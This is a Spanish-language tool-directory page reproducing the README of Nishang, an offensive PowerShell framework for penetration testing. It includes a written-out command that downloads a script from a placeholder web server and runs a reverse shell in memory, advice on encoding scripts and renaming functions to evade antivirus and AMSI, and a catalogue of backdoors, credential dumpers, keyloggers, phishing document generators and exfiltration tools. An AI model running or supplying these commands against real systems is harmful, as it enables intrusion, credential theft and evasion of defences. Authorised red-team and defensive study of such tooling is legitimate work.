Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
nishang — Nishang - PowerShell ofensivo para equipo rojo, pruebas de penetración y seguridad ofensiva. | Kitploit
Herramientas/GitHubGitHub/samratashok/nishang
Descifrado de ContraseñasHerramientas de PhishingEscalada de PrivilegiosGeneración de PayloadsExplotaciónMovimiento LateralExfiltración de DatosRecopilación de InformaciónPost-ExplotaciónPruebas de PenetraciónComando y ControlRed Teaming
10.0k2.5k54hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHubsamratashok/nishang

nishang

Nishang - PowerShell ofensivo para equipo rojo, pruebas de penetración y seguridad ofensiva.

Ver Repositorio

Nishang

Nishang es un conjunto de scripts y payloads que permite el uso de PowerShell para seguridad ofensiva, pruebas de penetración y red teaming. Nishang es útil durante todas las fases de las pruebas de penetración.

Por Nikhil Mittal Fundador de Altered Security - ¡Formación práctica en red team y seguridad empresarial!

Uso

Importa todos los scripts en la sesión actual de PowerShell (PowerShell v3 en adelante).

root@kitploit:~
PS C:\nishang> Import-Module .\nishang.psm1

Usa los scripts individuales con dot sourcing.

root@kitploit:~
PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1

PS C:\nishang> Get-Information

Para obtener ayuda sobre cualquier script o función, usa:

root@kitploit:~
PS C:\nishang> Get-Help [scriptname] -full

Nota: desde la versión 0.3.8, la ayuda está disponible para la función cargada después de ejecutar el script, no para el script en sí. En todos los casos, el nombre de la función es el mismo que el del script.

Por ejemplo, para ver la ayuda sobre Get-WLAN-Keys.ps1, usa

root@kitploit:~
PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1

PS C:\nishang> Get-Help Get-WLAN-Keys -Full

Anti Virus

Los scripts de Nishang son marcados como maliciosos por muchos antivirus. Los scripts en un objetivo deben ejecutarse en memoria, algo muy fácil de hacer con PowerShell. Dos métodos básicos para ejecutar scripts de PowerShell en memoria:

Método 1. Usa la descarga y ejecución en memoria: Usa el siguiente comando para ejecutar un script de PowerShell desde un shell remoto, un shell nativo de meterpreter, una web shell, etc., y la función que exporta. Todos los scripts de Nishang exportan una función con el mismo nombre en la sesión actual de PowerShell.

root@kitploit:~
powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]

Método 2. Usa el parámetro -encodedcommand (o -e) de PowerShell Todos los scripts de Nishang exportan una función con el mismo nombre en la sesión actual de PowerShell. Por lo tanto, asegúrate de que la llamada a la función se realiza en el propio script al usar el parámetro encodedcommand desde un shell que no sea PowerShell. Para el ejemplo anterior, añade una llamada a la función (sin comillas) "Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]".

Codifica el script usando Invoke-Encode de Nishang:

root@kitploit:~
PS C:\nishang> . \nishang\Utility\Invoke-Encode

PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand

Datos codificados escritos en .\encoded.txt Comando codificado escrito en .\encodedcommand.txt

A partir de lo anterior, usa el script codificado de encodedcommand.txt y ejecútalo en un objetivo donde se puedan ejecutar comandos (un shell remoto, un shell nativo de meterpreter, una web shell, etc.). Úsalo de la siguiente manera:

root@kitploit:~
C:\Users\target> powershell -e [encodedscript]

Si los scripts aún son detectados, cambiar los nombres de funciones y parámetros y eliminar el contenido de ayuda puede ayudar.

En caso de que AMSI de Windows 10 aún bloquee la ejecución del script, consulta este blog: http://www.labofapenetrationtester.com/2016/09/amsi.html

Scripts

Nishang actualmente contiene los siguientes scripts y payloads.

ActiveDirectory

Set-DCShadowPermissions

Modifica objetos de AD para proporcionar los permisos mínimos requeridos para DCShadow.

Antak - la Web Shell

Antak

Ejecuta scripts de PowerShell en memoria, ejecuta comandos, y descarga y sube archivos usando esta web shell.

Puertas traseras

HTTP-Backdoor

Una puerta trasera que puede recibir instrucciones de sitios web de terceros y ejecutar scripts de PowerShell en memoria.

DNS_TXT_Pwnage

Una puerta trasera que puede recibir comandos y scripts de PowerShell desde consultas DNS TXT, ejecutarlos en un objetivo, y ser controlada remotamente mediante consultas.

Execute-OnTime

Una puerta trasera que puede ejecutar scripts de PowerShell en un momento específico en un objetivo.

Gupt-Backdoor

Una puerta trasera que puede recibir comandos y scripts desde un SSID de WLAN sin conectarse a él.

Add-ScrnSaveBackdoor

Una puerta trasera que puede usar el protector de pantalla de Windows para ejecución remota de comandos y scripts.

Invoke-ADSBackdoor

Una puerta trasera que puede usar flujos de datos alternativos y el Registro de Windows para lograr persistencia.

Add-RegBackdoor

Una puerta trasera que usa el conocido truco del depurador para ejecutar payloads con Sticky keys y Utilman (Tecla Windows + U).

Set-RemoteWMI

Modifica permisos de DCOM y espacios de nombres WMI para permitir acceso a un usuario no administrador.

Set-RemotePSRemoting

Modifica permisos de la comunicación remota de PowerShell para permitir acceso a un usuario no administrador.

Bypass

Invoke-AmsiBypass

Implementación de métodos conocidos públicamente para evitar/eludir AMSI.

Cliente

Out-CHM

Crea archivos CHM infectados que pueden ejecutar comandos y scripts de PowerShell.

Out-Word

Crea archivos de Word e infecta los existentes para ejecutar comandos y scripts de PowerShell.

Out-Excel

Crea archivos de Excel e infecta los existentes para ejecutar comandos y scripts de PowerShell.

Out-HTA

Crea un archivo HTA que puede desplegarse en un servidor web y usarse en campañas de phishing.

Out-Java

Crea archivos JAR firmados que pueden usarse con applets para la ejecución de scripts y comandos.

Out-Shortcut

Crea archivos de acceso directo capaces de ejecutar comandos y scripts de PowerShell.

Out-WebQuery

Crea archivos IQY para phishing de credenciales y hashes SMB.

Out-JS

Crea archivos JS capaces de ejecutar comandos y scripts de PowerShell.

Out-SCT

Crea archivos SCT capaces de ejecutar comandos y scripts de PowerShell.

Out-SCF

Crea un archivo SCF que puede usarse para capturar desafíos de hash NTLM.

Escalación

Enable-DuplicateToken

Cuando se requieren privilegios SYSTEM.

Remove-Update

Introduce vulnerabilidades eliminando parches.

Invoke-PsUACme

Bypass de UAC.

Ejecución

Download-Execute-PS

Descarga y ejecuta un script de PowerShell en memoria.

Download_Execute

Descarga un ejecutable en formato de texto, lo convierte a ejecutable y lo ejecuta.

Execute-Command-MSSQL

Ejecuta comandos de PowerShell, comandos nativos o comandos SQL en un servidor MSSQL con privilegios suficientes.

Execute-DNSTXT-Code

Ejecuta shellcode en memoria usando consultas DNS TXT.

Out-RundllCommand

Ejecuta comandos y scripts de PowerShell o una sesión inversa de PowerShell usando rundll32.exe.

Recopilación

Check-VM

Verifica si es una máquina virtual.

Copy-VSS

Copia el archivo SAM usando el servicio de copia de sombra de volumen.

Invoke-CredentialsPhish

Engaña a un usuario para que proporcione credenciales en texto plano.

FireBuster FireListener

Un par de scripts para pruebas de egreso.

Get-Information

Obtiene información valiosa de un objetivo.

Get-LSASecret

Obtiene el secreto LSA de un objetivo.

Get-PassHashes

Obtiene los hashes de contraseñas de un objetivo.

Get-WLAN-Keys

Obtiene las claves WLAN en texto plano de un objetivo.

Keylogger

Registra las pulsaciones de teclado de un objetivo.

Invoke-MimikatzWdigestDowngrade

Extrae contraseñas de usuario en texto plano en Windows 8.1 y Server 2012.

Get-PassHints

Obtiene las sugerencias de contraseña de los usuarios de Windows de un objetivo.

Show-TargetScreen

Conecta de vuelta y transmite la pantalla del objetivo usando MJPEG.

Invoke-Mimikatz

Carga mimikatz en memoria. Actualizado y con algunas personalizaciones.

Invoke-Mimikittenz

Extrae información valiosa de la memoria de procesos objetivo (como navegadores) usando expresiones regulares.

Invoke-SSIDExfil

Exfiltra información como credenciales de usuario usando el SSID de WLAN.

Invoke-SessionGopher

Identifica jump-boxes de administrador y/o equipos usados para acceder a máquinas Unix.

MITM

Invoke-Interceptor

Un proxy HTTPS local para ataques MITM.

Pivot

Create-MultipleSessions

Verifica credenciales en múltiples equipos y crea PSSessions.

Run-EXEonRemote Copia y ejecuta un ejecutable en múltiples máquinas.

Invoke-NetworkRelay Crea relays de red entre equipos.

Prasadhak

Prasadhak

Verifica los hashes de los procesos en ejecución contra la base de datos de VirusTotal.

Escaneo

Brute-Force

Fuerza bruta FTP, Active Directory, MSSQL y Sharepoint.

Port-Scan

Un escáner de puertos práctico.

Powerpreter

Powerpreter

Toda la funcionalidad de nishang en un único módulo de script.

Shells

Invoke-PsGcat

Envía comandos y scripts a una cuenta de Gmail especificada para ser ejecutados por Invoke-PsGcatAgent.

Invoke-PsGcatAgent

Ejecuta comandos y scripts enviados por Invoke-PsGcat.

Invoke-PowerShellTcp

Un shell interactivo inverso o de escucha de PowerShell sobre TCP.

Invoke-PowerShellTcpOneLine

Versión reducida de Invoke-PowerShellTcp. También contiene una versión esqueleto que podría caber en dos tweets.

Invoke-PowerShellTcpOneLineBind

Versión de escucha de Invoke-PowerShellTcpOneLine.

Invoke-PowerShellUdp

Un shell interactivo inverso o de escucha de PowerShell sobre UDP.

Invoke-PowerShellUdpOneLine

Versión reducida de Invoke-PowerShellUdp.

Invoke-PoshRatHttps

PowerShell interactivo inverso sobre HTTPS.

Invoke-PoshRatHttp

PowerShell interactivo inverso sobre HTTP.

Remove-PoshRat

Limpia el sistema después de usar Invoke-PoshRatHttps.

Invoke-PowerShellWmi

PowerShell interactivo usando WMI.

Invoke-PowerShellIcmp

Un shell inverso interactivo de PowerShell sobre ICMP.

Invoke-JSRatRundll

Un shell inverso interactivo de PowerShell sobre HTTP usando rundll32.exe.

Invoke-JSRatRegsvr

Un shell inverso interactivo de PowerShell sobre HTTP usando regsvr32.exe.

Utilidad

Add-Exfiltration

Añade capacidad de exfiltración de datos a Gmail, Pastebin, un servidor web y DNS a cualquier script.

Add-Persistence

Añade capacidad de persistencia al reinicio a un script.

Remove-Persistence

Elimina la persistencia añadida por el script Add-Persistence.

Do-Exfiltration

Tubería (|) a cualquier script para exfiltrar la salida.

Download

Transfiere un archivo al objetivo.

Parse_Keys

Analiza las teclas registradas por el keylogger.

Invoke-Encode

Codifica y comprime un script o cadena.

Invoke-Decode

Decodifica y descomprime un script o cadena de Invoke-Encode.

Start-CaptureServer

Ejecuta un servidor web que registra autenticación básica y hashes SMB.

ConvertTo-ROT13

Codifica una cadena a ROT13 o decodifica una cadena ROT13.

Out-DnsTxt

Genera registros DNS TXT que podrían usarse con otros scripts.

[Base64ToString]

[StringToBase64]

[ExetoText]

[TexttoExe]

Actualizaciones

Las actualizaciones sobre Nishang se pueden encontrar en mi blog http://labofapenetrationtester.com y en mi Twitter @nikhil_mitt.

Errores, Comentarios y Solicitudes de Funcionalidades

Por favor, abre un issue si encuentras un error o tienes una solicitud de funcionalidad. Puedes enviarme un correo electrónico a nikhil [dot] uitrgpv at gmail.com

Lista de correo

Para comentarios, discusiones y solicitudes de funcionalidades, únete a: http://groups.google.com/group/nishang-users

Contribuir

Siempre estoy buscando contribuyentes para Nishang. Por favor, envía solicitudes o envíame un correo electrónico.

Publicaciones en el blog

Algunas publicaciones útiles para principiantes:

http://www.labofapenetrationtester.com/2014/06/nishang-0-3-4.html

http://labofapenetrationtester.com/2012/08/introducing-nishang-powereshell-for.html

http://labofapenetrationtester.com/2013/08/powerpreter-and-nishang-Part-1.html

http://www.labofapenetrationtester.com/2013/09/powerpreter-and-nishang-Part-2.html

Todas las publicaciones sobre Nishang:

http://www.labofapenetrationtester.com/search/label/Nishang

Descargar herramienta